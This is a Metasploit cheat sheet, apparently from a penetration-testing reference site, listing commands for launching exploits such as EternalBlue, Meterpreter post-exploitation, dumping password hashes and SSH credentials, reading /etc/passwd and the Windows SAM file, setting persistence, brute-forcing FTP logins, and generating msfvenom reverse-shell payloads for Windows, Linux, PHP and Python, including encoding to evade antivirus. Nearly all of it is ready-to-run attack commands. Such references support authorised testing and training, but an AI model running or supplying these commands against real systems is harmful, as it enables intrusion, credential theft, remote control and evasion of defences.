Skip to main content

Metasploit Cheat Sheet

Starting Metasploit

# Start database
sudo service postgresql start

# Launch msfconsole
msfconsole
msfconsole -q   # quiet (no banner)

Core Commands

# Search for modules
search type:exploit name:eternalblue
search cve:2021-44228
search platform:windows smb

# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/smb/smb_ms17_010

# Show module info
info
show options
show targets
show payloads

# Set options
set RHOSTS 192.168.1.1
set RPORT 445
set LHOST 10.10.10.10
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Run module
run
exploit

# Background session
background
Ctrl+Z

Meterpreter Commands

# System info
sysinfo
getuid
getpid

# Navigation
pwd
ls
cd /tmp
cat /etc/passwd

# Upload / download
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Windows\\System32\\SAM /tmp/SAM

# Shell
shell                     # Drop to OS shell
exit                      # Return to meterpreter

# Privilege escalation
getsystem                 # Attempt auto privesc
getprivs                  # List privileges

# Process migration
ps                        # List processes
migrate 1234              # Migrate to PID

# Pivoting
portfwd add -l 8080 -p 80 -r 192.168.1.5   # Local port forward
run post/multi/manage/shell_to_meterpreter

Post Exploitation Modules

# Gather credentials
run post/windows/gather/hashdump
run post/multi/gather/ssh_creds
run post/linux/gather/hashdump

# Enumerate system
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_logged_on_users
run post/linux/gather/enum_system

# Persistence
run post/windows/manage/persistence_exe

Sessions

# List sessions
sessions -l

# Interact with session
sessions -i 1

# Kill session
sessions -k 1

# Kill all sessions
sessions -K

# Run command on all sessions
sessions -c whoami

Auxiliary Scanners

# SMB version
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

# Port scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445
run

# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.1
set USER_FILE /usr/share/wordlists/users.txt
set PASS_FILE /usr/share/wordlists/passwords.txt
run

MSFvenom Payloads

# List payloads
msfvenom -l payloads | grep windows

# Windows reverse shell (exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell (elf)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.py

# Encode to evade AV
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe